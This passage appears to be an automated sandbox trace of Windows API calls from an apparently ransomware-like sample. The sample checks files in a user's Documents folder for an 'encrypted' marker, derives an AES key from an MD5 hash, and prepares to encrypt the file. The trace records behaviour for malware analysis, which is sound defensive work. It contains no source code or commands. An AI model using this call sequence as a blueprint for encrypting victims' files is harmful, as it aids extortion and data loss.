lpString1="private\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rivate\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ivate\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vate\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ate\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="te\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="folder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="older.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lder.ico\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.646] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.646] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.646] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.646] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="co", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ico", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ico", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.646] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.646] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.646] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.647] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.647] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="folder.ico", cAlternateFileName="")) returned 0x7c2100 [0036.647] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.647] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.647] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.647] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.647] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.647] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.647] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.647] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.647] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.648] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.648] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.648] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0036.648] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.649] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0036.649] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.649] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.649] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0036.649] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.649] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.649] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.649] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.649] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.650] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.650] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.650] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.650] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.650] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.650] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.650] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.650] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.650] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.650] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.651] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.651] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.651] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.651] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.651] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.651] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.651] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.652] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac350 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.654] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0036.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | 